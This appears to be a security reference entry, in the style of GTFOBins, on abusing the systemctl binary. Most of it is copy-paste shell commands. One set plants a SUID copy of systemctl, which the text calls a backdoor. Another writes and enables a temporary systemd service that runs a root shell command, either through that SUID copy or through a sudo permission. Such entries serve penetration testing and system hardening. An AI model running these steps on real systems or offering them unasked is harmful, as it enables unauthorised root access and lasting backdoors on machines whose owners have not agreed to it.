It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p
, omit the -p
argument on systems
like Debian that allow the default sh
shell to run with SUID privileges.
sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo
.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF